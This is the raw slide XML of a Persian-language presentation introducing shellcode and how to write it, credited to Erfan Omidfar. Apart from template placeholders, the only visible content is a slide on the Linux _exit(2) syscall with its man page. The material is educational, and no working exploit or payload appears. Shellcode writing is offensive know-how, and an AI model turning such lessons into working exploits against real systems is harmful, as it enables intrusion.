          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="ffffff"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="d1ca75"/>
              </a:gs>
            </a:gsLst>
            <a:path path="rect"/>
          </a:gradFill>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="" id="1" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143640" cy="6857640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 2"/>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895d1d"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>6/25/13</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="895d1d"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>تهران لاگ           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="895d1d"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>92/04/04</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{7181D100-3151-4121-B111-517191B1E191}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="895d1d"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4173480" y="2887560"/>
            <a:ext cx="866880" cy="913320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000" wrap="none"/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="7b541a"/>
                </a:solidFill>
                <a:latin typeface="Wingdings"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1193760" y="3431520"/>
            <a:ext cx="3119760" cy="1440"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="7b541a"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4853160" y="3429000"/>
            <a:ext cx="3119760" cy="1440"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="7b541a"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="PlaceHolder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1183320" y="1387800"/>
            <a:ext cx="6777000" cy="1731600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Click to edit the title text formatClick to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="PlaceHolder 9"/>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2" name="CustomShape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143640" cy="6857640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="ffffff"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="d1ca75"/>
              </a:gs>
            </a:gsLst>
            <a:path path="rect"/>
          </a:gradFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Click to edit the outline text format</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buSzPct val="75000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Second Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Third Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buSzPct val="75000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Fourth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Fifth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="5">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Sixth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Seventh Outline LevelClick to edit Master text styles</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Fourth level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Fifth level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="PlaceHolder 3"/>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6/25/13</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr"/>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46" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{61015151-9151-4111-9151-1131C141F171}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688320" y="570240"/>
            <a:ext cx="7755840" cy="1053720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="895d1d"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Click to edit the title text formatClick to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="CustomShape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4152240" y="1392120"/>
            <a:ext cx="866880" cy="913320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000" wrap="none"/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="dba455"/>
                </a:solidFill>
                <a:latin typeface="Wingdings"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Line 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1172520" y="1936080"/>
            <a:ext cx="3119760" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="dba455"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Line 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4831920" y="1933200"/>
            <a:ext cx="3119760" cy="1440"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="dba455"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>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685800" y="1143000"/>
            <a:ext cx="8076960" cy="1731600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>معرفی شل‌کد و نحوه‌ی نوشتن آن</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3767760"/>
            <a:ext cx="6400440" cy="1752120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Erfan Omidfar   </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>                                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>erfan.omidfar@yahoo.com</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="895d1d"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>تهران لاگ           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="895d1d"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>92/04/04</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{512181F1-B191-4191-8171-A1C131319191}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="895d1d"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>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699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>We know from the /usr/src/linux/include/asm-i386/unistd.h file (see above) that it is number 1. The man page tells us that it requires only one parameter (status):</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126"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27" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{C191F161-01B1-4111-81A1-41A1B1A121A1}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688320" y="570240"/>
            <a:ext cx="7755840" cy="1053720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="895d1d"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>classic example: the _exit(2) syscall</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105880" y="3651120"/>
            <a:ext cx="1294920" cy="463680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="cfe7f5"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="1" bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>man 2 _exit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="4191120"/>
            <a:ext cx="3885840" cy="2437920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="cfe7f5"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="1" bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>_EXIT(2)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>Linux Programmer's Manual</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>_EXIT(2)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>NAME</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>_exit, _Exit - terminate the current process</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
